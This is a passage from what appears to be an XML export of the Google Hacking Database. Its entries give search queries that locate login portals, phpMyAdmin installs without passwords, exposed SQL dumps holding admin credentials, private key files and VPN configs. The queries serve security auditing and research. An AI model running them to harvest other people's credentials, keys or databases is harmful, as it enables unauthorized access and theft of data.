<date>2016-02-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>420</id>
<link>https://www.exploit-db.com/ghdb/420</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Ultima Online loginservers</shortDescription>
<textualDescription>This one finds login servers for the Ultima Online game.</textualDescription>
<query>filetype:cfg login &quot;LoginServer=&quot;</query>
<querystring>https://www.google.com/search?q=filetype%3Acfg+login+%22LoginServer%3D%22</querystring>
<edb></edb>
<date>2004-08-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>500</id>
<link>https://www.exploit-db.com/ghdb/500</link>
<category>Pages Containing Login Portals</category>
<shortDescription>W-Nailer Upload Area</shortDescription>
<textualDescription>What is W-Nailer?W-Nailer is a PHP script which can create galleries for you.It uses a graphical library (GD) which enables PHP to manipulate images, for instance resizing to create thumbnails.W-Nailer is highly configurable to meet your needs. Even better, the configuration is nearly completely webbased.So after you have uploaded your files, you will just need your browser!</textualDescription>
<query>uploadpics.php?did= -forum</query>
<querystring>https://www.google.com/search?q=uploadpics.php%3Fdid%3D+-forum</querystring>
<edb></edb>
<date>2005-01-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>3825</id>
<link>https://www.exploit-db.com/ghdb/3825</link>
<category>Pages Containing Login Portals</category>
<shortDescription>you really should fix this security hole by setting a password for user '.root'. inurl:/phpmyadmin intitle:localhost</shortDescription>
<textualDescription>Gives sites with default username root and no password
--
nitish mehta</textualDescription>
<query>you really should fix this security hole by setting a password for user '.root'. inurl:/phpmyadmin intitle:localhost</query>
<querystring>https://www.google.com/search?q=you really should fix this security hole by setting a password for user '.root'. inurl:/phpmyadmin intitle:localhost</querystring>
<edb></edb>
<date>2012-12-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>6961</id>
<link>https://www.exploit-db.com/ghdb/6961</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Zenario CMS Login Page</shortDescription>
<textualDescription># Google Dork: Zenario CMS Login Page
# Date: 24th May 2021
# Exploit Author: Harsh Joshi, Omkar Ghaisas , Amit Chavare
# Dork : intitle:&quot;Welcome to Zenario&quot;
*Thanks*
*Harsh Joshi
</textualDescription>
<query>Zenario CMS Login Page</query>
<querystring>https://www.google.com/search?q=Zenario CMS Login Page</querystring>
<edb></edb>
<date>2021-05-28</date>
<author>Harsh Mukeshbhai Joshi</author>
</entry>
<entry>
<id>4297</id>
<link>https://www.exploit-db.com/ghdb/4297</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Zixmail inurl:/s/login?</shortDescription>
<textualDescription>Zixmail Secure Email Logon Portals.
-Xploit </textualDescription>
<query>Zixmail inurl:/s/login?</query>
<querystring>https://www.google.com/search?q=Zixmail inurl:/s/login?</querystring>
<edb></edb>
<date>2016-06-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>1425</id>
<link>https://www.exploit-db.com/ghdb/1425</link>
<category>Pages Containing Login Portals</category>
<shortDescription>||Powered by [ClipBucket 2.0.91]</shortDescription>
<textualDescription>This search identifies clpbpucket installations. They frequently have an admin/admin default password on the administrative backend located at: http://server/admin_area/login.php .
Author: Zhran Team</textualDescription>
<query>||Powered by [ClipBucket 2.0.91]</query>
<querystring>https://www.google.com/search?q=||Powered+by+[ClipBucket+2.0.91]&amp;num=10&amp;ft=i&amp;cr=&amp;safe=images</querystring>
<edb></edb>
<date>2010-11-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>6505</id>
<link>https://www.exploit-db.com/ghdb/6505</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;-- Dump completed&quot; ext:sql | ext:txt | ext:log</shortDescription>
<textualDescription># Google Dork: &quot;-- Dump completed&quot; ext:sql | ext:txt | ext:log
# Sensitive directories.
# Date: 29/08/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;-- Dump completed&quot; ext:sql | ext:txt | ext:log</query>
<querystring>https://www.google.com/search?q=&quot;-- Dump completed&quot; ext:sql | ext:txt | ext:log</querystring>
<edb></edb>
<date>2020-08-31</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6726</id>
<link>https://www.exploit-db.com/ghdb/6726</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;-- Dumped from database version&quot; + &quot;-- Dumped by pg_dump version&quot; ext:txt | ext:sql | ext:env | ext:log</shortDescription>
<textualDescription># Google Dork: &quot;-- Dumped from database version&quot; + &quot;-- Dumped by pg_dump version&quot; ext:txt | ext:sql | ext:env | ext:log
# Sensitive directories.
# Date: 12/12/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;-- Dumped from database version&quot; + &quot;-- Dumped by pg_dump version&quot; ext:txt | ext:sql | ext:env | ext:log</query>
<querystring>https://www.google.com/search?q=&quot;-- Dumped from database version&quot; + &quot;-- Dumped by pg_dump version&quot; ext:txt | ext:sql | ext:env | ext:log</querystring>
<edb></edb>
<date>2020-12-11</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6566</id>
<link>https://www.exploit-db.com/ghdb/6566</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;-- Dumping data for table * &quot; ext:sql | ext:xls intext:db | intext:database | intext:password | username</shortDescription>
<textualDescription># Dork: &quot;-- Dumping data for table * &quot; ext:sql | ext:xls intext:db | intext:database | intext:password | username
This dork is helping in finding sensitive directories that includes
usernames and passwords of all tables present in any database.
Thank you
</textualDescription>
<query>&quot;-- Dumping data for table * &quot; ext:sql | ext:xls intext:db | intext:database | intext:password | username</query>
<querystring>https://www.google.com/search?q=&quot;-- Dumping data for table * &quot; ext:sql | ext:xls intext:db | intext:database | intext:password | username</querystring>
<edb></edb>
<date>2020-09-24</date>
<author>mittal.pratham</author>
</entry>
<entry>
<id>6649</id>
<link>https://www.exploit-db.com/ghdb/6649</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;-- Dumping data for table `admin`&quot; | &quot;-- INSERT INTO `admin`&quot; &quot;VALUES&quot; ext:sql | ext:txt | ext:log | ext:env</shortDescription>
<textualDescription># Google Dork: &quot;-- Dumping data for table `admin`&quot; | &quot;-- INSERT INTO `admin`&quot; &quot;VALUES&quot; ext:sql | ext:txt | ext:log | ext:env
# Sensitive directories containing many times admin usernames and passwords.
# Date: 3/11/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;-- Dumping data for table `admin`&quot; | &quot;-- INSERT INTO `admin`&quot; &quot;VALUES&quot; ext:sql | ext:txt | ext:log | ext:env</query>
<querystring>https://www.google.com/search?q=&quot;-- Dumping data for table `admin`&quot; | &quot;-- INSERT INTO `admin`&quot; &quot;VALUES&quot; ext:sql | ext:txt | ext:log | ext:env</querystring>
<edb></edb>
<date>2020-11-04</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6564</id>
<link>https://www.exploit-db.com/ghdb/6564</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;-- Dumping data for table `users` | `people` | `member`&quot; ext:sql | ext:txt | ext:log | ext:env</shortDescription>
<textualDescription># Google Dork:&quot;-- Dumping data for table `users` | `people` | `member`&quot;
ext:sql | ext:txt | ext:log | ext:env
# Sensitive directories including usernames, passwords and more.
# Date: 23/09/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;-- Dumping data for table `users` | `people` | `member`&quot; ext:sql | ext:txt | ext:log | ext:env</query>
<querystring>https://www.google.com/search?q=&quot;-- Dumping data for table `users` | `people` | `member`&quot; ext:sql | ext:txt | ext:log | ext:env</querystring>
<edb></edb>
<date>2020-09-23</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6538</id>
<link>https://www.exploit-db.com/ghdb/6538</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;-- PostgreSQL database dump complete&quot; ext:sql | ext:txt | ext:log | ext:env</shortDescription>
<textualDescription># Google Dork: &quot;-- PostgreSQL database dump complete&quot; ext:sql | ext:txt | ext:log | ext:env
# Sensitive directories.
# Date: 15/09/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;-- PostgreSQL database dump complete&quot; ext:sql | ext:txt | ext:log | ext:env</query>
<querystring>https://www.google.com/search?q=&quot;-- PostgreSQL database dump complete&quot; ext:sql | ext:txt | ext:log | ext:env</querystring>
<edb></edb>
<date>2020-09-15</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6789</id>
<link>https://www.exploit-db.com/ghdb/6789</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;-----BEGIN EC PRIVATE KEY-----&quot; | &quot; -----BEGIN EC PARAMETERS-----&quot; ext:pem | ext:key | ext:txt</shortDescription>
<textualDescription># Google Dork: &quot;-----BEGIN EC PRIVATE KEY-----&quot; | &quot; -----BEGIN EC PARAMETERS-----&quot; ext:pem | ext:key | ext:txt
# Sensitive directories.
# Date: 9/2/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;-----BEGIN EC PRIVATE KEY-----&quot; | &quot; -----BEGIN EC PARAMETERS-----&quot; ext:pem | ext:key | ext:txt</query>
<querystring>https://www.google.com/search?q=&quot;-----BEGIN EC PRIVATE KEY-----&quot; | &quot; -----BEGIN EC PARAMETERS-----&quot; ext:pem | ext:key | ext:txt</querystring>
<edb></edb>
<date>2021-02-11</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6788</id>
<link>https://www.exploit-db.com/ghdb/6788</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;-----BEGIN PGP PRIVATE KEY BLOCK-----&quot; ext:pem | ext:key | ext:txt -git</shortDescription>
<textualDescription># Google Dork: &quot;-----BEGIN PGP PRIVATE KEY BLOCK-----&quot; ext:pem | ext:key | ext:txt -git
# Sensitive directories.
# Date: 9/2/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;-----BEGIN PGP PRIVATE KEY BLOCK-----&quot; ext:pem | ext:key | ext:txt -git</query>
<querystring>https://www.google.com/search?q=&quot;-----BEGIN PGP PRIVATE KEY BLOCK-----&quot; ext:pem | ext:key | ext:txt -git</querystring>
<edb></edb>
<date>2021-02-11</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5179</id>
<link>https://www.exploit-db.com/ghdb/5179</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;/var/cache/registry/&quot;</shortDescription>
<textualDescription># Exploit Title:
CS-Cart admin panel settings information
# Google Dork:
&quot;/var/cache/registry/&quot;
# Date: 11, Apr, 2019
# Vendor Homepage:
https://www.cs-cart.com/
# Exploit Author: deadroot</textualDescription>
<query>&quot;/var/cache/registry/&quot;</query>
<querystring>https://www.google.com/search?q=&quot;/var/cache/registry/&quot;</querystring>
<edb></edb>
<date>2019-04-11</date>
<author>deadroot</author>
</entry>
<entry>
<id>3993</id>
<link>https://www.exploit-db.com/ghdb/3993</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;Config&quot; intitle:&quot;Index of&quot; intext:vpn</shortDescription>
<textualDescription>Directory with keys of vpn servers.
By Rootkit.</textualDescription>
<query>&quot;Config&quot; intitle:&quot;Index of&quot; intext:vpn</query>
<querystring>https://www.google.com/search?q=&quot;Config&quot; intitle:&quot;Index of&quot; intext:vpn</querystring>
<edb></edb>
<date>2015-02-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>5129</id>
<link>https://www.exploit-db.com/ghdb/5129</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;description&quot; &amp; &quot;size&quot; intitle:&quot;index of&quot; &quot;owncloud&quot;</shortDescription>
<textualDescription>Owncloud folders
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>&quot;description&quot; &amp; &quot;size&quot; intitle:&quot;index of&quot; &quot;owncloud&quot;</query>
<querystring>https://www.google.com/search?q=&quot;description&quot; &amp; &quot;size&quot; intitle:&quot;index of&quot; &quot;owncloud&quot;</querystring>
<edb></edb>
<date>2019-02-18</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4104</id>
<link>https://www.exploit-db.com/ghdb/4104</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;Desktop&quot; parent intitle:index.of</shortDescription>
<textualDescription>http://www.google.com/search?q=&quot;Desktop&quot; parent intitle:index.of
Desktops shared on the interwebs...
Decoy</textualDescription>
<query>&quot;Desktop&quot; parent intitle:index.of</query>
<querystring>https://www.google.com/search?q=&quot;Desktop&quot; parent intitle:index.of</querystring>
<edb></edb>
<date>2015-10-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>1149</id>
<link>https://www.exploit-db.com/ghdb/1149</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;Directory Listing for&quot; &quot;Hosted by Xerver&quot;</shortDescription>
<textualDescription>directory listing for Xerver web server</textualDescription>
<query>&quot;Directory Listing for&quot; &quot;Hosted by Xerver&quot;</query>
<querystring>https://www.google.com/search?q=%22Directory+Listing+for%22+%22Hosted+by+Xerver%22</querystring>
<edb></edb>
<date>2005-09-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>262</id>
<link>https://www.exploit-db.com/ghdb/262</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;Index Of /network&quot; &quot;last modified&quot;</shortDescription>
<textualDescription>Many of these directories contain information about the network, though an attacker would need a considerable amount of patience to find it.</textualDescription>
<query>&quot;Index Of /network&quot; &quot;last modified&quot;</query>
<querystring>https://www.google.com/search?q=%22Index+Of+%2Fnetwork%22+%22last+modified</querystring>
<edb></edb>
<date>2004-06-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>177</id>
<link>https://www.exploit-db.com/ghdb/177</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;index of cgi-bin&quot;</shortDescription>
<textualDescription>CGI directories contain scripts which can often be exploited by attackers. Regardless of the vulnerability of such scripts, a directory listing of these scripts can prove helpful.</textualDescription>
<query>&quot;index of cgi-bin&quot;</query>
<querystring>https://www.google.com/search?q=%22index+of+cgi%2Dbin%22</querystring>
<edb></edb>
<date>2004-04-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>6136</id>
<link>https://www.exploit-db.com/ghdb/6136</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;index of&quot; &quot;/config/sql&quot;</shortDescription>
<textualDescription># Title: Find sensitive SQL config files.
# Google Dork: &quot;index of&quot; &quot;/config/sql&quot;
# Date: 27/05/2020
# Author: Ritik Sahni
</textualDescription>
<query>&quot;index of&quot; &quot;/config/sql&quot;</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; &quot;/config/sql&quot;</querystring>
<edb></edb>
<date>2020-05-27</date>
<author>Ritik Sahni</author>
</entry>
<entry>
<id>6355</id>
<link>https://www.exploit-db.com/ghdb/6355</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;Index of&quot; &quot;/monitoring&quot;</shortDescription>
<textualDescription>Google Dork: &quot;Index of&quot; &quot;/monitoring&quot;
Category: Files containing Juicy Information
Let me know, how shall we proceed further.
Kind Regards,
Pawan Chhabria
</textualDescription>
<query>&quot;Index of&quot; &quot;/monitoring&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Index of&quot; &quot;/monitoring&quot;</querystring>
<edb></edb>
<date>2020-06-30</date>
<author>Pawan Chhabria</author>
</entry>
<entry>
<id>4928</id>
<link>https://www.exploit-db.com/ghdb/4928</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;Index of&quot; &quot;database.sql&quot;</shortDescription>
<textualDescription>&quot;Index of&quot; &quot;database.sql&quot;
This Google Dork discovers servers with open directories exposing
database files.
- Gionathan &quot;John&quot; Reale (https://www.exploit-db.com/author/?a=9609)
</textualDescription>
<query>&quot;Index of&quot; &quot;database.sql&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Index of&quot; &quot;database.sql&quot;</querystring>
<edb></edb>
<date>2018-08-20</date>
<author>Gionathan Reale</author>
</entry>
<entry>
<id>4938</id>
<link>https://www.exploit-db.com/ghdb/4938</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;index of&quot; &quot;database.sql.zip&quot;</shortDescription>
<textualDescription>&quot;index of&quot; &quot;database.sql.zip&quot;
This Google Dork discovers servers with open directories exposing
database backup files.
- Gionathan &quot;John&quot; Reale (https://www.exploit-db.com/author/?a=9609)
</textualDescription>
<query>&quot;index of&quot; &quot;database.sql.zip&quot;</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; &quot;database.sql.zip&quot;</querystring>
<edb></edb>
<date>2018-09-04</date>
<author>Gionathan Reale</author>
</entry>
<entry>
<id>4931</id>
<link>https://www.exploit-db.com/ghdb/4931</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;index of&quot; &quot;database_log&quot;</shortDescription>
<textualDescription>&quot;index of&quot; &quot;database_log&quot;
This Google Dork discovers servers exposing sensitive SQL log data.
- Gionathan &quot;John&quot; Reale (https://www.exploit-db.com/author/?a=9609)
</textualDescription>
<query>&quot;index of&quot; &quot;database_log&quot;</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; &quot;database_log&quot;</querystring>
<edb></edb>
<date>2018-08-27</date>
<author>Gionathan Reale</author>
</entry>
<entry>
<id>6577</id>
<link>https://www.exploit-db.com/ghdb/6577</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;index of&quot; &quot;email.ini&quot;</shortDescription>
<textualDescription>Google Dork: &quot;index of&quot; &quot;email.ini&quot;
Description : Disclosure of database file tables and sensitive files.
Date : 26/09/2020
Author: Aninda Saha
</textualDescription>
<query>&quot;index of&quot; &quot;email.ini&quot;</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; &quot;email.ini&quot;</querystring>
<edb></edb>
<date>2020-09-28</date>
<author>Aninda Saha</author>
</entry>
<entry>
<id>6257</id>
<link>https://www.exploit-db.com/ghdb/6257</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;index of&quot; &quot;fileadmin&quot;</shortDescription>
<textualDescription>Dork: &quot;index of&quot; &quot;fileadmin&quot;
Author: Hemant Patidar (HemantSolo)
Linkedin: https://www.linkedin.com/in/hemantsolo/
Hemant Patidar
Ethical Hacker | Founder and CEO at Solo Securities,
Cyber Security Analyst at Ismile Technologies
Pursuing B.Tech Civil Engineering from SRM University
</textualDescription>
<query>&quot;index of&quot; &quot;fileadmin&quot;</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; &quot;fileadmin&quot;</querystring>
<edb></edb>
<date>2020-06-09</date>
<author>Hemant Patidar</author>
</entry>
<entry>
<id>6598</id>
<link>https://www.exploit-db.com/ghdb/6598</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;index of&quot; &quot;mysql.sh&quot;</shortDescription>
<textualDescription># Title: Sensitive Data Exposure
# Google Dork: &quot;index of&quot; &quot;mysql.sh&quot;
# Date: 2020-09-14
# Author: Virendra Tiwari
# LinkedIn: https://www.linkedin.com/in/virendratiwari/
</textualDescription>
<query>&quot;index of&quot; &quot;mysql.sh&quot;</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; &quot;mysql.sh&quot;</querystring>
<edb></edb>
<date>2020-10-07</date>
<author>Virendra Tiwari</author>
</entry>
<entry>
<id>6546</id>
<link>https://www.exploit-db.com/ghdb/6546</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;index of&quot; &quot;performance_schema&quot;</shortDescription>
<textualDescription># Google Dork: &quot;index of&quot; &quot;performance_schema&quot;
# Description :- Disclosure of sensitive files.
# Date: 17/09/2020
# Author: Sahil Saxena
# LinkedIn: https://www.linkedin.com/in/sahil-saxena-1333b9174
Thanks,
Sahil Saxena
</textualDescription>
<query>&quot;index of&quot; &quot;performance_schema&quot;</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; &quot;performance_schema&quot;</querystring>
<edb></edb>
<date>2020-09-17</date>
<author>Sahil Saxena</author>
</entry>
<entry>
<id>6266</id>
<link>https://www.exploit-db.com/ghdb/6266</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;Index of&quot; &quot;sass-cache&quot;</shortDescription>
<textualDescription>Google Dork: &quot;Index of&quot; &quot;sass-cache&quot;
Category: Sensitive Directories
Author: Prashant Sharma (@Prashantique)
LinkedIn: https://www.linkedin.com/in/prashantique/
</textualDescription>
<query>&quot;Index of&quot; &quot;sass-cache&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Index of&quot; &quot;sass-cache&quot;</querystring>
<edb></edb>
<date>2020-06-10</date>
<author>Prashant Sharma</author>
</entry>
<entry>
<id>6259</id>
<link>https://www.exploit-db.com/ghdb/6259</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;index of&quot; &quot;svg&quot;</shortDescription>
<textualDescription># Google Dork: &quot;index of&quot; &quot;svg&quot;
# Title: Sensitive file disclosure
# Date: 06/06/2020
# Author: Mahesh Rai
# LinkedIn: https://www.linkedin.com/in/mahesh-rai
# Bugcrowd: https://bugcrowd.com/Mahesh_Rai
</textualDescription>
<query>&quot;index of&quot; &quot;svg&quot;</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; &quot;svg&quot;</querystring>
<edb></edb>
<date>2020-06-10</date>
<author>Mahesh Rai</author>
</entry>
<entry>
<id>6540</id>
<link>https://www.exploit-db.com/ghdb/6540</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;index of&quot; &quot;users.ibd&quot;</shortDescription>
<textualDescription># Google Dork: &quot;index of&quot; &quot;users.ibd&quot;
# Description :- Disclosure of database file tables and sensitive files.
# Date: 13/09/2020
# Author: Sahil Saxena
# LinkedIn: https://www.linkedin.com/in/sahil-saxena-1333b9174
Thanks,
Sahil Saxena
</textualDescription>
<query>&quot;index of&quot; &quot;users.ibd&quot;</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; &quot;users.ibd&quot;</querystring>
<edb></edb>
<date>2020-09-15</date>
<author>Sahil Saxena</author>
</entry>
<entry>
<id>366</id>
<link>https://www.exploit-db.com/ghdb/366</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;index of&quot; / picasa.ini</shortDescription>
<textualDescription>Picasa is an 'Automated Digital Photo Organizer' recently aquired by Google. This search allows the voyer to browse directories of photos uploaded using the picasa software.</textualDescription>
<query>&quot;index of&quot; / picasa.ini</query>
<querystring>https://www.google.com/search?q=%22index+of%22+%2F+picasa.ini+&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-07-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>4463</id>
<link>https://www.exploit-db.com/ghdb/4463</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;Index of&quot; inurl:&quot;/$Recycle.Bin/&quot;</shortDescription>
<textualDescription>Windows recycle bins might not seem very interesting, but you would be
surprised how much juicy info is in there!
Dxtroyer</textualDescription>
<query>&quot;Index of&quot; inurl:&quot;/$Recycle.Bin/&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Index of&quot; inurl:&quot;/$Recycle.Bin/&quot;</querystring>
<edb></edb>
<date>2017-05-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>5277</id>
<link>https://www.exploit-db.com/ghdb/5277</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;Index of&quot; inurl:config inurl:production</shortDescription>
<textualDescription>Dork: &quot;Index of&quot; inurl:config inurl:production
Description:
Open Directory listing with words &quot;config&quot; and &quot;production&quot; in the URL
</textualDescription>
<query>&quot;Index of&quot; inurl:config inurl:production</query>
<querystring>https://www.google.com/search?q=&quot;Index of&quot; inurl:config inurl:production</querystring>
<edb></edb>
<date>2019-07-15</date>
<author>Isaiah Puzon</author>
</entry>
<entry>
<id>6682</id>
<link>https://www.exploit-db.com/ghdb/6682</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;index of&quot; inurl:database ext:sql | xls | xml | json | csv</shortDescription>
<textualDescription># Title: Sensitive Data Exposure
# Google Dork: &quot;index of&quot; inurl:database ext:sql | xls | xml | json | csv
# Date: 2020-11-10
# Author: Yogender Singh
# LinkedIn: https://www.linkedin.com/in/imyoge10/
Regards
Yogender Singh
</textualDescription>
<query>&quot;index of&quot; inurl:database ext:sql | xls | xml | json | csv</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; inurl:database ext:sql | xls | xml | json | csv</querystring>
<edb></edb>
<date>2020-11-17</date>
<author>Yogender Singh</author>
</entry>
<entry>
<id>5321</id>
<link>https://www.exploit-db.com/ghdb/5321</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;Index of&quot; inurl:htdocs inurl:xampp</shortDescription>
<textualDescription>Google Dork: &quot;Index of&quot; inurl:htdocs inurl:xampp
Date: 08/02/2019
Author: Adrian Roy Lorica
</textualDescription>
<query>&quot;Index of&quot; inurl:htdocs inurl:xampp</query>
<querystring>https://www.google.com/search?q=&quot;Index of&quot; inurl:htdocs inurl:xampp</querystring>
<edb></edb>
<date>2019-08-02</date>
<author>Adrian Roy Lorica</author>
</entry>
<entry>
<id>5320</id>
<link>https://www.exploit-db.com/ghdb/5320</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;Index of&quot; inurl:phpmyadmin</shortDescription>
<textualDescription>Google Dork: inurl: &quot;Index of&quot; inurl:phpmyadmin
Date: 08/02/2019
Author: Adrian Roy Lorica
</textualDescription>
<query>&quot;Index of&quot; inurl:phpmyadmin</query>
<querystring>https://www.google.com/search?q=&quot;Index of&quot; inurl:phpmyadmin</querystring>
<edb></edb>
<date>2019-08-02</date>
<author>Adrian Roy Lorica</author>
</entry>
<entry>
<id>205</id>
<link>https://www.exploit-db.com/ghdb/205</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;index of&quot; inurl:recycler</shortDescription>
<textualDescription>This is the default name of the Windows recycle bin. The files in this directory may contain sensitive information. Attackers can also crawl the directory structure of the site to find more information. In addition, the SID of a user is revealed also. An attacker could use this in a variety of ways.</textualDescription>
<query>&quot;index of&quot; inurl:recycler</query>
<querystring>https://www.google.com/search?q=%22index+of%22+inurl%3Arecycler</querystring>
<edb></edb>
<date>2004-05-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>3836</id>
<link>https://www.exploit-db.com/ghdb/3836</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;index of&quot; inurl:root intitle:symlink</shortDescription>
<textualDescription>Google Dork: index of&quot; inurl:root intitle:symlink
Steal Others Symlink
Author: Un0wn_X</textualDescription>
<query>&quot;index of&quot; inurl:root intitle:symlink</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; inurl:root intitle:symlink</querystring>
<edb></edb>
<date>2013-04-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>3837</id>
<link>https://www.exploit-db.com/ghdb/3837</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;index of&quot; inurl:sym</shortDescription>
<textualDescription>Google Dork: &quot;index of&quot; inurl:sym
You can Steal the symlinks of other Servers
Author: Un0wn_X</textualDescription>
<query>&quot;index of&quot; inurl:sym</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; inurl:sym</querystring>
<edb></edb>
<date>2013-04-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>5319</id>
<link>https://www.exploit-db.com/ghdb/5319</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;Index of&quot; inurl:webalizer</shortDescription>
<textualDescription>Google Dork: &quot;Index of&quot; inurl:webalizer
Date: 08/02/2019
Author: Adrian Roy Lorica
</textualDescription>
<query>&quot;Index of&quot; inurl:webalizer</query>
<querystring>https://www.google.com/search?q=&quot;Index of&quot; inurl:webalizer</querystring>
<edb></edb>
<date>2019-08-02</date>
<author>Adrian Roy Lorica</author>
</entry>
<entry>
<id>814</id>
<link>https://www.exploit-db.com/ghdb/814</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;Index of&quot; rar r01 nfo Modified 2004</shortDescription>
<textualDescription>New Warez Directory Lists</textualDescription>
<query>&quot;Index of&quot; rar r01 nfo Modified 2004</query>
<querystring>https://www.google.com/search?q=%22Index+of%22+rar+r01+nfo+Modified+2004</querystring>
<edb></edb>
<date>2005-01-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>672</id>
<link>https://www.exploit-db.com/ghdb/672</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;intitle:Index.Of /&quot; stats merchant cgi-* etc</shortDescription>
<textualDescription>This search looks for indexes with the following subdirectories: stats, merchant, online-store and cgi-local or cgi-bin. These servers have a shopping cart application called softcart in their cgi-local or cgi-bin directory. Reportedly, it is possible to execute arbitrary code by passing a malformed CGI parameter in an HTTP GET request. This issue is known to affect SoftCart version 4.00b.</textualDescription>
<query>&quot;intitle:Index.Of /&quot; stats merchant cgi-* etc</query>
<querystring>https://www.google.com/search?q=%22intitle%3AIndex.Of+%2F%22+stats+merchant+cgi-*+etc</querystring>
<edb></edb>
<date>2004-11-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>3991</id>
<link>https://www.exploit-db.com/ghdb/3991</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;jos_users&quot; intitle:&quot;Index of&quot;</shortDescription>
<textualDescription>&quot;jos_users&quot; intitle:&quot;Index of&quot;
Files of configuration of user Joomla servers.
By Rootkit.</textualDescription>
<query>&quot;jos_users&quot; intitle:&quot;Index of&quot;</query>
<querystring>https://www.google.com/search?q=&quot;jos_users&quot; intitle:&quot;Index of&quot;</querystring>
<edb></edb>
<date>2015-02-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>5700</id>
<link>https://www.exploit-db.com/ghdb/5700</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;key&quot; OR key.jar intitle:&quot;index of&quot; webstart</shortDescription>
<textualDescription>*Java Web Start* (also known as *JavaWS*, *javaws* or *JAWS*) allows users
to start application software for the Java Platform directly from the
Internet using a web browser.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>&quot;key&quot; OR key.jar intitle:&quot;index of&quot; webstart</query>
<querystring>https://www.google.com/search?q=&quot;key&quot; OR key.jar intitle:&quot;index of&quot; webstart</querystring>
<edb></edb>
